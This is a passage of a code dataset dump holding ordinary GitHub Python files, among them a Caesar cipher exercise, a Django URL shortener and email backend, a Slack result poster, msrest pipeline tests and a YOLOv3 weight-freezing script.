point):\n mapping_dict = self.build_shift_dict(shift_list[i]) \n for ch in word:\n if ch in string.ascii_letters:\n real_char_list.append(mapping_dict[ch])\n real_word.append( ''.join(real_char_list))\n real_char_list= []\n i+=1\n return real_word\n\nif __name__ == '__main__':\n print(\"Welcome to Caesar Cipher Console\")\n inp = input(\"Enter the console Definition \\n 0 :Encrypt the message \\n 1: Decrypt the message \\n\")\n if inp == '0':\n text = input(\"Enter text to Encrypt\")\n text_list = re.findall(r\"[\\w']+|[.,!?;]+ |[\\\" @#$%^&*()_+\\<\\>\\!\\{\\}\\'\\\\\\/]\", text)\n# print(text_list)\n Encrypted_word = []\n for word in text_list:\n if word in string.punctuation:\n Encrypted_word.append(word)\n else:\n T = Message(word)\n shift = randint(1, 25)\n Encrypted_word.append(T.apply_shift(shift))\n print(''.join(Encrypted_word))\n if inp == '1':\n proceed = 1\n try:\n text = input(\"Enter Message to decrypt\")\n T = CiphertextMessage(text)\n print(T.decrypt_message())\n except:\n proceed =0\n print(\"The text entered has Encountered an Error.\\n Please check the Spellings and input only the valid Words for Encryption as provided in the wordlist.\")\n if proceed == 1:\n print(\"Some Words might have actually found multiple solutions. Would you like to review them? \")\n key = input(\"0: NO thanks i have found the message! \\n1:Yes give me those.The message is not clear!\\n\")\n if key == '1':\n text_list = re.findall(r\"[\\w']+|[.,!?;]+ |[\\\" @#$%^&*()_+\\<\\>\\!\\{\\}\\'\\\\\\/]\", text)\n for word in text_list:\n if word not in string.punctuation:\n if word != \" \" :\n print(word + ':',T.get_multiple(word))","repo_name":"AbhilashKonduri/6.0001_MITOCW","sub_path":"PSET_4_Encryption_Decryption/Encrypt_Decrypt_1.py","file_name":"Encrypt_Decrypt_1.py","file_ext":"py","file_size_in_byte":13241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25491492944","text":"from subprocess import Popen, PIPE, STDOUT\nfrom outlawg import Outlawg\n\n\nLog = Outlawg()\n\nSEP = ', UUID: '\nLABEL_PLAN_FOUND = 'Found plan: '\nLABEL_PLAN_ADDED = 'Added plan: '\nHOST = '127.0.0.1'\nPORT = 8080\nSTOP_FLAG = 'Listening on port'\n\n\ndef process(cmd, header_label):\n proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, shell=True)\n Log.header(header_label.upper())\n for line in iter(proc.stdout.readline, b''):\n print(line.strip())\n\n\ndef description_parse(description_raw):\n tmp = description_raw.replace(LABEL_PLAN_FOUND, \"\")\n return tmp.replace(LABEL_PLAN_ADDED, \"\")\n\n\ndef process_parse(cmd, header_label):\n proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, shell=True)\n Log.header(header_label.upper())\n uuids = []\n\n for line in iter(proc.stdout.readline, b''):\n line_clean = str(line.strip())\n print(line_clean)\n\n line_chunks = line_clean.split(SEP)\n\n # database is loaded, exit from readline\n if STOP_FLAG in line_clean:\n break\n\n if SEP in line_clean:\n menu_item = line_chunks[0].split('] ')\n\n d = {}\n d['description'] = description_parse(menu_item[1])\n d['uuid'] = line_chunks[1].replace(\"\\'\", \"\")\n\n uuids.append(d)\n\n return proc, uuids\n","repo_name":"loads/loads-cli","sub_path":"loads/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"26328935678","text":"import os\nimport json\nimport numpy as np\nimport codecs\n\nimport torch.utils.data\n\nfrom caption.utils.inference import BOS, EOS, UNK\n\nclass CaptionDatasetBase(torch.utils.data.Dataset):\n def __init__(self, word2int_file, ref_caption_file=None, \n max_words_in_sent=20, is_train=False, return_label=False, _logger=None):\n if _logger is None:\n self.print_fn = print\n else:\n self.print_fn = _logger.info\n\n if word2int_file.endswith('json'):\n self.word2int = json.load(open(word2int_file))\n else:\n self.word2int = np.load(word2int_file)\n self.int2word = {i: w for w, i in self.word2int.items()}\n\n if ref_caption_file is not None:\n self.ref_captions = json.load(open(ref_caption_file))\n\n self.max_words_in_sent = max_words_in_sent\n self.is_train = is_train\n self.return_label = return_label\n\n def sent2int(self, str_sent):\n int_sent = [self.word2int.get(w, UNK) for w in str_sent.split()]\n return int_sent\n\n def pad_sents(self, int_sent, add_bos_eos=True):\n if add_bos_eos:\n sent = [BOS] + int_sent + [EOS]\n else:\n sent = int_sent\n sent = sent[:self.max_words_in_sent]\n num_pad = self.max_words_in_sent - len(sent)\n mask = [True]*len(sent) + [False] * num_pad\n sent = sent + [EOS] * num_pad\n return sent, mask\n\n def pad_or_trim_feature(self, attn_ft, max_len, average=False):\n seq_len, dim_ft = attn_ft.shape\n mask = np.zeros((max_len, ), np.bool)\n \n # pad\n if seq_len < max_len:\n new_ft = np.zeros((max_len, dim_ft), np.float32)\n new_ft[:seq_len] = attn_ft\n mask[:seq_len] = True\n elif seq_len == max_len:\n new_ft = attn_ft\n mask[:] = True\n # trim\n else:\n if average:\n idxs = np.round(np.linspace(0, seq_len, max_len+1)).astype(np.int32)\n new_ft = np.array([np.mean(attn_ft[idxs[i]: idxs[i+1]], axis=0) for i in range(max_len)])\n else:\n idxs = np.round(np.linspace(0, seq_len-1, max_len)).astype(np.int32)\n new_ft = attn_ft[idxs]\n mask[:] = True\n return new_ft, mask\n\n \n","repo_name":"cshizhe/asg2cap","sub_path":"caption/readers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"47"} +{"seq_id":"34243916349","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom shortener.helper import CustomJsonResponse\n\nfrom drf_yasg.utils import swagger_auto_schema\nfrom drf_yasg import openapi\nimport string\nimport random\nfrom url_mapping.models import UrlMapping\nfrom django.conf import settings\nimport urllib\nfrom django.shortcuts import redirect\n\nurllib.parse.urljoin\nmy_domain = getattr(settings, 'DOMAIN') or 'http://127.0.0.1:8000'\n\n\nclass ShortenerView(APIView):\n @swagger_auto_schema(operation_summary='S01-01 short url',\n operation_description='given url, return shorted url',\n request_body=openapi.Schema(\n type=openapi.TYPE_OBJECT,\n properties={\n 'url':\n openapi.Schema(\n type=openapi.TYPE_STRING,\n description='url',\n example='https://www.google.com'),\n }))\n def post(self, request):\n origin_url = request.data.get('url')\n obj, created = UrlMapping.objects.get_or_create(origin_url=origin_url)\n if created:\n obj.pk\n letters = string.ascii_letters\n code = ''.join(random.choice(letters) for i in range(20))\n obj.shortener_url = code\n obj.save()\n else:\n code = obj.shortener_url\n result = {\n \"origin_url\":\n origin_url,\n \"short_url\":\n urllib.parse.urljoin(my_domain, f'short/{obj.shortener_url}')\n }\n return CustomJsonResponse(result_data=result, return_message='success')\n\n\nclass RecoveryUrlView(APIView):\n @swagger_auto_schema(\n operation_summary='S01-02 revovery url', )\n def get(self, request, shorted_url):\n errors = {}\n try:\n obj = UrlMapping.objects.get(shortener_url=shorted_url)\n except UrlMapping.DoesNotExist:\n errors['url_error'] = f\"url does not exist.\"\n except Exception as e:\n errors['error'] = e\n if errors:\n return CustomJsonResponse(\n result_data=errors,\n return_message=\"can not find this url code\")\n return redirect(obj.origin_url)\n # result = {\"url\": obj.origin_url}\n # return CustomJsonResponse(result_data=result, return_message='success')","repo_name":"johney4415/symphox","sub_path":"src/url_mapping/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31967159466","text":"import setuptools\n\n#Get long description from readme file\nwith open(\"README.md\", 'r') as readme_file:\n long_description = readme_file.read()\n\nsetuptools.setup(\n name=\"InequalityMetrics\",\n version=\"1.0.4\",\n author=\"Tom Logan, Mitchell Anderson\",\n author_email=\"tom.logan@canterbury.ac.nz\",\n description=\"Inequality Metrics contains functions for the Kolm-Pollak, Atkinson EDE and Gini Index aproaches to calculating inequality distributions\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/michael-j-freeman/urutau-inequality-metrics\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n install_requires=[\n 'scipy',\n 'numpy'\n ],\n python_requires='>=3',\n)\n\n#There are other things which can be modified","repo_name":"michael-j-freeman/urutau-inequality-metrics","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23056265614","text":"prg_comment = \"\"\nprg_version = \"0.7\"\ndef program(prg, cmd):\n prg.add(0, \"OpticalBEC_2019-10-15\")\n prg.add(140100000, \"Synchronize.sub\")\n prg.add(140200000, \"+-1_mixture_preparation\")\n prg.add(142202000, \"TTL uW 2 ON\", enable=False)\n prg.add(142207000, \"DDS41_setfull\", ch0_amp=0, ch0_freq=0.000, ch1_freq=0.000, ch0_phase=0.000, ch1_phase=0.000, ch1_amp=0, functions=dict(ch0_freq=lambda x: 100e6 + cmd.get_var('uW_freq1')*1e3 + cmd.get_var('uW_Delta')*1e3, ch1_freq=lambda x: 100e6 + cmd.get_var('uW_freq2')*1e3 + cmd.get_var('uW_Delta')*1e3, ch0_phase=lambda x: cmd.get_var('beat_phase'), ch0_amp=lambda x: cmd.get_var('uW_amp1'), ch1_amp=lambda x: cmd.get_var('uW_amp2')), enable=False)\n prg.add(142209000, \"TTL uW 1 (100W) ON\", enable=False)\n prg.add(142215000, \"TTL uW 1 (100W) OFF\", enable=False)\n prg.add(142215200, \"Oscilloscope Trigger ON\", enable=False)\n prg.add(142216400, \"soliton_imaging\", enable=False)\n prg.add(142216400, \"transfer_m1to0\", enable=False)\n prg.add(142226400, \"Switch Off Dipole\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')))\n prg.add(142236400, \"transfer_m1to0\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')))\n prg.add(142246400, \"DDSpulse\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')), enable=False)\n prg.add(142246400, \"interferometer\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')), enable=False)\n prg.add(142246400, \"TTL uW 2 ON\")\n prg.add(142246400, \"TTL uW 2 OFF\", functions=dict(time=lambda x: x + cmd.get_var('uW_pulse')))\n prg.add(142249300, \"Oscilloscope Trigger ON\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')))\n prg.add(142249400, \"three_pictures_hamamatsu\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')), enable=False)\n prg.add(142249400, \"transfer_m1m2\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')), enable=False)\n prg.add(142249400, \"transfer_p1p2\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')), enable=False)\n prg.add(142249500, \"transfer_p1to0\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')), enable=False)\n prg.add(142249500, \"transfer_0to0\", enable=False)\n prg.add(142249500, \"two_photon_pulse_DDS\", functions=dict(time=lambda x: x - cmd.get_var('uW_pulse') + cmd.get_var('hold_time')), enable=False)\n prg.add(142249500, \"interferometer\", enable=False)\n prg.add(142249510, \"Oscilloscope Trigger ON\", enable=False)\n prg.add(142279510, \"TOF_Levitation\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')))\n prg.add(142282630, \"imaging_repump\", functions=dict(time=lambda x: x + cmd.get_var('tof') + cmd.get_var('hold_time')), enable=False)\n prg.add(142284730, \"three-pictures_VarProbeDet_190625\", functions=dict(time=lambda x: x + cmd.get_var('tof') + cmd.get_var('hold_time')))\n prg.add(142289050, \"Oscilloscope Trigger OFF\")\n prg.add(142307950, \"All uW OFF\", enable=False)\n prg.add(146284730, \"Cigar_beam_check\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')))\n prg.add(146294730, \"TTL uW 1 (100W) OFF\", functions=dict(time=lambda x: x + cmd.get_var('hold_time')))\n prg.add(186294730, \"wait\")\n return prg\ndef commands(cmd):\n import numpy as np\n iters = np.linspace(0.000000, 0.100000, 10.000000)\n np.random.shuffle(iters)\n j = 0\n while(cmd.running):\n print('\\n-------o-------')\n uW_pulse = iters[j]\n cmd.set_var('uW_pulse', uW_pulse)\n print('\\n')\n print('Run #%d/%d, with variables:\\nuW_pulse = %g\\n'%(j+1, len(iters), uW_pulse))\n cmd._system.run_number = j\n cmd.run(wait_end=True, add_time=100)\n j += 1\n if j == len(iters):\n cmd._system.run_number = 0\n cmd.stop()\n return cmd\n","repo_name":"BEC-Trento/BEC2-data","sub_path":"programs/OpticalBEC_uW1phrabifreq.py","file_name":"OpticalBEC_uW1phrabifreq.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12765476788","text":"from collections.abc import Sequence\nfrom smtplib import SMTPException\n\nfrom django.core.mail.backends.base import BaseEmailBackend\nfrom django.core.mail.message import EmailMessage\nfrom django.db import transaction\n\nfrom organization.models import EmailLog\n\n\nclass DatabaseEmailBackend(BaseEmailBackend):\n \"\"\"\n A custom email backend that logs email failures to a database.\n \"\"\"\n\n def send_messages(self, email_messages: Sequence[EmailMessage]) -> int:\n \"\"\"\n Sends the provided list of email messages.\n\n If sending fails for a message, it creates a new `EmailLog` instance with the\n subject, recipient email address, and error message and saves it to the database.\n\n The database operations are wrapped in a transaction to ensure atomicity.\n\n Args:\n email_messages: A list of `EmailMessage` objects to send.\n\n Returns:\n The number of sent messages.\n \"\"\"\n\n num_sent = 0\n with transaction.atomic():\n for message in email_messages:\n try:\n message.send()\n num_sent += 1\n except SMTPException as email_error:\n email_log = EmailLog(\n subject=message.subject,\n to_email=\", \".join(message.to),\n error=str(email_error),\n )\n email_log.save()\n return num_sent\n","repo_name":"Monta-Application/Monta","sub_path":"server/backend/email_backend.py","file_name":"email_backend.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"47"} +{"seq_id":"9759369655","text":"import requests\nimport json\nimport sys\n\n\ndef fix_input_text(data: list) -> str:\n # Convert the input JSON string to a Python list\n input_list = json.loads(data)\n\n # Create a new list to store the fixed format dictionaries\n output_list = []\n\n # Iterate over each dictionary in the input list\n for item in input_list:\n # Extract the values from the dictionary\n axis_value = item['axis_value']\n outcome = item['outcome']\n test_details = item['test_details']\n\n # Create a new dictionary in the correct format\n new_item = {\n 'axis_value': axis_value,\n 'outcome': outcome,\n 'test_details': test_details\n }\n\n # Append the new dictionary to the output list\n output_list.append(new_item)\n\n # Convert the output list to JSON string in the correct format\n output_json = json.dumps(output_list, indent=4)\n\n return output_json\n\ndef prepare_message(data, app_name, app_version) -> str:\n message = \"\"\n \n if app_name != \"\":\n app_details = app_name\n if app_version != \"\":\n app_details += \" - \" + app_version\n \n if app_details != \"\":\n message += \"> *Version*\\n\"\n message += \"> \" + app_details + \"\\n\"\n\n message += \"> *Test Details*\\n\"\n for item in data:\n name = item[\"axis_value\"]\n outcome = item[\"outcome\"]\n if outcome == \"Passed\":\n mark = \":white_check_mark:\"\n elif outcome == \"Failed\":\n mark = \":x:\"\n else:\n mark = \":warning:\"\n message += \"> Device: \" + name + \" - \" + outcome + \" \" + mark + \"\\n\"\n \n return message\n\n\ndef send_message(message: str):\n payload = {\n \"text\": message\n }\n headers = {\n \"Content-Type\": \"application/json\"\n }\n \n response = requests.post(slack_webhook_url, data=json.dumps(payload), headers=headers)\n if response.status_code != 200:\n print(f\"Error sending message to Slack: {response.text}\")\n else:\n print(\"Message sent successfully!\")\n\n\n#### Script starts here ####\n\n# get the input file\ninput_file = sys.argv[1]\n\n# get the slack webhook url\nslack_webhook_url = sys.argv[2]\n\n# get the app name\nif len(sys.argv) > 3:\n app_name = sys.argv[3]\nelse:\n app_name = \"\"\n\n# get the app version\nif len(sys.argv) > 4:\n app_version = sys.argv[4]\nelse:\n app_version = \"\"\n\nwith open(input_file) as f:\n try:\n print(\"Reading input file...\")\n input = f.read()\n fixed_input = fix_input_text(input)\n\n last_input = fixed_input\n\n print(f\"Input: {input}\")\n print(f\"Fixed input: {last_input}\")\n \n data = json.loads(last_input)\n \n message = prepare_message(data, app_name, app_version)\n\n print(\"Sending message to Slack...\")\n send_message(message)\n\n \n except Exception as e:\n print(\"Error reading input file or sending message to Slack: \" + str(e))\n \n","repo_name":"muhammed9865/Robo-Test-Automation","sub_path":"script/post_result_slack.py","file_name":"post_result_slack.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1071791238","text":"from selenium import webdriver\nimport time\n\nfrom selenium.webdriver import ActionChains\n\ndriver = webdriver.Chrome(executable_path=\"E:\\Selenium_using_python\\chromedriver.exe\")\ndriver.get(\"https://www.nationsonline.org/oneworld/countries_of_the_world.htm\")\n\n#Scroll by pixel value\n# time.sleep(3)\n# driver.execute_script(\"window.scrollBy(0,3000)\",\"\")\n# time.sleep(5)\n\n# Scroll down page until element found\n# flag = driver.find_element_by_xpath(\"//a[normalize-space()='Colombia']\")\n# driver.execute_script(\"arguments[0].scrollIntoView();\",flag)\n# time.sleep(10)\n\n#Scroll down till page end\n# driver.execute_script(\"window.scrollBy(0,document.body.scrollHeight)\")\n# time.sleep(10)\n\n#Using Action Class\nl=driver.find_element_by_xpath(\"//a[normalize-space()='Colombia']\")\na = ActionChains(driver)\na.move_to_element(l).perform()\ntime.sleep(10)\n\ndriver.close()","repo_name":"Aishwarya4/selenium-python","sub_path":"Selenium_Projects/Scrolling.py","file_name":"Scrolling.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"7655937461","text":"from tkinter import *\nfrom tkinter.ttk import *\n\n#root\nroot = Tk()\nroot.title(\"UGh\")\nroot.geometry('500x500')\n\ncombo = Combobox(root)\ncombo['values'] = (1,2,3,4,5, \"Text\")\ncombo.current(1)\ncombo.grid(column=0,row=0)\n\n#chk_state = BooleanVar()\n#chk_state.set(True) #set check state\nchk_state = IntVar()\n\n#chk_state.set(0) #uncheck\n\nchk_state.set(1) #check\nchk = Checkbutton(root, text='Choose', var=chk_state)\nchk.grid(column=1, row=1)\n\nroot.mainloop()\n","repo_name":"Cabandadan/waifu-bot","sub_path":"tests/learn2.py","file_name":"learn2.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"72304715982","text":"try:\n from unittest import mock\nexcept ImportError:\n import mock\n\nimport requests\n\nimport pytest\n\nfrom msrest.exceptions import DeserializationError\nfrom msrest.universal_http import (\n ClientRequest,\n ClientResponse,\n HTTPClientResponse,\n)\nfrom msrest.universal_http.requests import RequestsClientResponse\n\nfrom msrest.pipeline import (\n Response,\n Request\n)\nfrom msrest.pipeline.universal import (\n HTTPLogger,\n RawDeserializer,\n UserAgentPolicy\n)\n\ndef test_user_agent():\n\n with mock.patch.dict('os.environ', {'AZURE_HTTP_USER_AGENT': \"mytools\"}):\n policy = UserAgentPolicy()\n assert policy.user_agent.endswith(\"mytools\")\n\n request = ClientRequest('GET', 'http://127.0.0.1/')\n policy.on_request(Request(request))\n assert request.headers[\"user-agent\"].endswith(\"mytools\")\n\n@mock.patch('msrest.http_logger._LOGGER')\ndef test_no_log(mock_http_logger):\n universal_request = ClientRequest('GET', 'http://127.0.0.1/')\n request = Request(universal_request)\n http_logger = HTTPLogger()\n response = Response(request, ClientResponse(universal_request, None))\n\n # By default, no log handler for HTTP\n http_logger.on_request(request)\n mock_http_logger.debug.assert_not_called()\n http_logger.on_response(request, response)\n mock_http_logger.debug.assert_not_called()\n mock_http_logger.reset_mock()\n\n # I can enable it per request\n http_logger.on_request(request, **{\"enable_http_logger\": True})\n assert mock_http_logger.debug.call_count >= 1\n http_logger.on_response(request, response, **{\"enable_http_logger\": True})\n assert mock_http_logger.debug.call_count >= 1\n mock_http_logger.reset_mock()\n\n # I can enable it per request (bool value should be honored)\n http_logger.on_request(request, **{\"enable_http_logger\": False})\n mock_http_logger.debug.assert_not_called()\n http_logger.on_response(request, response, **{\"enable_http_logger\": False})\n mock_http_logger.debug.assert_not_called()\n mock_http_logger.reset_mock()\n\n # I can enable it globally\n http_logger.enable_http_logger = True\n http_logger.on_request(request)\n assert mock_http_logger.debug.call_count >= 1\n http_logger.on_response(request, response)\n assert mock_http_logger.debug.call_count >= 1\n mock_http_logger.reset_mock()\n\n # I can enable it globally and override it locally\n http_logger.enable_http_logger = True\n http_logger.on_request(request, **{\"enable_http_logger\": False})\n mock_http_logger.debug.assert_not_called()\n http_logger.on_response(request, response, **{\"enable_http_logger\": False})\n mock_http_logger.debug.assert_not_called()\n mock_http_logger.reset_mock()\n\n\ndef test_raw_deserializer():\n raw_deserializer = RawDeserializer()\n\n def build_response(body, content_type=None):\n class MockResponse(HTTPClientResponse):\n def __init__(self, body, content_type):\n super(MockResponse, self).__init__(None, None)\n self._body = body\n if content_type:\n self.headers['content-type'] = content_type\n\n def body(self):\n return self._body\n return Response(None, MockResponse(body, content_type))\n\n # I deserialize XML\n response = build_response(b\"\", content_type=\"application/xml\")\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result.tag == \"groot\"\n\n # The basic deserializer works with unicode XML\n result = raw_deserializer.deserialize_from_text(u'', content_type=\"application/xml\")\n assert result.attrib[\"language\"] == u\"français\"\n\n # Catch some weird situation where content_type is XML, but content is JSON\n response = build_response(b'{\"ugly\": true}', content_type=\"application/xml\")\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result[\"ugly\"] is True\n\n # Be sure I catch the correct exception if it's neither XML nor JSON\n with pytest.raises(DeserializationError):\n response = build_response(b'gibberish', content_type=\"application/xml\")\n raw_deserializer.on_response(None, response, stream=False)\n with pytest.raises(DeserializationError):\n response = build_response(b'{{gibberish}}', content_type=\"application/xml\")\n raw_deserializer.on_response(None, response, stream=False)\n\n # Simple JSON\n response = build_response(b'{\"success\": true}', content_type=\"application/json\")\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result[\"success\"] is True\n\n # Simple JSON with complex content_type\n response = build_response(b'{\"success\": true}', content_type=\"application/vnd.microsoft.appconfig.kv+json\")\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result[\"success\"] is True\n\n # JSON with UTF-8 BOM\n response = build_response(b'\\xef\\xbb\\xbf{\"success\": true}', content_type=\"application/json; charset=utf-8\")\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result[\"success\"] is True\n\n # For compat, if no content-type, decode JSON\n response = build_response(b'\"data\"')\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result == \"data\"\n\n # Try with a mock of requests\n\n req_response = requests.Response()\n req_response.headers[\"content-type\"] = \"application/json\"\n req_response._content = b'{\"success\": true}'\n req_response._content_consumed = True\n response = Response(None, RequestsClientResponse(None, req_response))\n\n raw_deserializer.on_response(None, response, stream=False)\n result = response.context[\"deserialized_data\"]\n assert result[\"success\"] is True\n","repo_name":"Azure/msrest-for-python","sub_path":"tests/test_universal_pipeline.py","file_name":"test_universal_pipeline.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"47"} +{"seq_id":"19762191147","text":"'''\nCreated on 2012-11-24\n\n@author: bkybar\n'''\nimport xml.etree.ElementTree as ET\nfrom src.ReGEN.IO.XMLModificationWriter import XMLModificationWriter\n\nclass XMLStoryGraphWriter():\n \n \"\"\"\n Initialize our Social Graph Writer\n \"\"\"\n def __init__(self, path, name, graph):\n self._filename= path + name\n self._path = path\n self._graph = graph\n \n \"\"\"\n Write our graph to the file\n \"\"\"\n def writeGraph(self):\n \n #Write our root head\n root = ET.Element('graph')\n root.attrib['name'] = self._graph.get_name()\n root.attrib['type'] = \"Story_Graph\"\n #Write our nodes\n nodes = ET.SubElement(root, 'nodes')\n for node in self._graph.get_nodes():\n new_node = ET.SubElement(nodes, 'node')\n new_node.attrib['name'] = node.get_name()\n \n #Write the target\n target = ET.SubElement(new_node, 'target')\n target.text = node.get_target().get_name()\n\n #Write the attributes\n for attribute in node.get_attributes():\n \n #A Special Case for Node_Type\n if attribute == \"Node_Type\":\n nodetype = ET.SubElement(new_node, 'nodetype')\n nodetype.text = node.get_attributes()[attribute]\n else:\n attr = ET.SubElement(new_node, 'attr')\n attr.attrib['name'] = attribute\n attr.attrib['type'] = type(node.get_attributes()[attribute]).__name__\n \n value = ET.SubElement(attr, 'value')\n value.text = str(node.get_attributes()[attribute])\n \n #Check for modifications\n if not node.get_modification() == None:\n modification_name = node.get_name() + \"_Modification.xml\"\n modification_filename = self._path + \"/Modifications/\" + modification_name\n new_node.attrib['modification'] = modification_name\n modification_writer = XMLModificationWriter(modification_filename, node.get_modification())\n modification_writer.writeModification()\n else:\n new_node.attrib['modification'] = 'None'\n \n #Write our connections\n connections = ET.SubElement(root, 'connections')\n for edge in self._graph.get_edges():\n \n #Make the connection\n connection = ET.SubElement(connections, 'connection')\n connection.attrib['from'] = edge.get_from_node().get_name()\n connection.attrib['to'] = edge.get_to_node().get_name()\n \n #Set the relation\n relation = ET.SubElement(connection, 'relation')\n \n if edge.get_key() == None:\n relation.attrib[\"none\"] = \"none\"\n else:\n relation.attrib[edge.get_key()] = edge.get_value()\n \n #Write our xml to a file\n tree = ET.ElementTree(root)\n tree.write(self._filename + \".xml\")\n ","repo_name":"QuinnKybartas/ReGEN","sub_path":"ReGEN-Python/src/ReGEN/IO/XMLStoryGraphWriter.py","file_name":"XMLStoryGraphWriter.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"47"} +{"seq_id":"41704929879","text":"import os\nimport sys\nimport wget\nimport time\nimport argparse\nimport tensorflow as tf\nfrom core import yolov3, utils\n\n\nclass parser(argparse.ArgumentParser):\n\n def __init__(self,description):\n super(parser, self).__init__(description)\n\n self.add_argument(\n \"--ckpt_file\", \"-cf\", default='./checkpoint/yolov3.ckpt', type=str,\n help=\"[default: %(default)s] The checkpoint file ...\",\n metavar=\"\",\n )\n\n self.add_argument(\n \"--weights_path\", \"-wp\", default='./checkpoint/yolov3.weights', type=str,\n help=\"[default: %(default)s] Download binary file with desired weights\",\n metavar=\"\",\n )\n\n self.add_argument(\n \"--convert\", \"-cv\", action='store_true',\n help=\"[default: %(default)s] Downloading yolov3 weights and convert them\",\n )\n\n self.add_argument(\n \"--freeze\", \"-fz\", action='store_true',\n help=\"[default: %(default)s] freeze the yolov3 graph to pb ...\",\n )\n\n self.add_argument(\n \"--image_size\", \"-is\", default=416, type=int,\n help=\"[default: %(default)s] The image size, 416 or 608\",\n metavar=\"\",\n )\n\n self.add_argument(\n \"--iou_threshold\", \"-it\", default=0.5, type=float,\n help=\"[default: %(default)s] The iou_threshold for gpu nms\",\n metavar=\"\",\n )\n\n self.add_argument(\n \"--score_threshold\", \"-st\", default=0.5, type=float,\n help=\"[default: %(default)s] The score_threshold for gpu nms\",\n metavar=\"\",\n )\n\n\ndef main(argv):\n\n flags = parser(description=\"freeze yolov3 graph from checkpoint file\").parse_args()\n classes = utils.read_coco_names(\"./data/coco.names\")\n num_classes = len(classes)\n SIZE = flags.image_size\n print(\"=> the input image size is [%d, %d]\" %(SIZE, SIZE))\n model = yolov3.yolov3(num_classes)\n\n with tf.Graph().as_default() as graph:\n sess = tf.Session(graph=graph)\n inputs = tf.placeholder(tf.float32, [1, SIZE, SIZE, 3]) # placeholder for detector inputs\n\n with tf.variable_scope('yolov3'):\n feature_map = model.forward(inputs, is_training=False)\n\n boxes, confs, probs = model.predict(feature_map)\n scores = confs * probs\n print(\"=>\", boxes, scores)\n boxes, scores, labels = utils.gpu_nms(boxes, scores, num_classes,\n score_thresh=flags.score_threshold,\n iou_thresh=flags.iou_threshold)\n print(\"=>\", boxes, scores, labels)\n feature_map_1, feature_map_2, feature_map_3 = feature_map\n print(\"=>\", feature_map_1, feature_map_2, feature_map_3)\n saver = tf.train.Saver(var_list=tf.global_variables(scope='yolov3'))\n\n if flags.convert:\n if not os.path.exists(flags.weights_path):\n url = 'https://github.com/YunYang1994/tensorflow-yolov3/releases/download/v1.0/yolov3.weights'\n for i in range(3):\n time.sleep(1)\n print(\"=> %s does not exists ! \" %flags.weights_path)\n print(\"=> It will take a while to download it from %s\" %url)\n print('=> Downloading yolov3 weights ... ')\n wget.download(url, flags.weights_path)\n\n load_ops = utils.load_weights(tf.global_variables(scope='yolov3'), flags.weights_path)\n sess.run(load_ops)\n save_path = saver.save(sess, save_path=flags.ckpt_file)\n print('=> model saved in path: {}'.format(save_path))\n\n if flags.freeze:\n saver.restore(sess, flags.ckpt_file)\n print('=> checkpoint file restored from ', flags.ckpt_file)\n utils.freeze_graph(sess, './checkpoint/yolov3_cpu_nms.pb', [\"concat_9\", \"mul_6\"])\n utils.freeze_graph(sess, './checkpoint/yolov3_gpu_nms.pb', [\"concat_10\", \"concat_11\", \"concat_12\"])\n utils.freeze_graph(sess, './checkpoint/yolov3_feature.pb', [\"yolov3/yolo-v3/feature_map_1\",\n \"yolov3/yolo-v3/feature_map_2\",\n \"yolov3/yolo-v3/feature_map_3\",])\n\n\nif __name__ == \"__main__\": 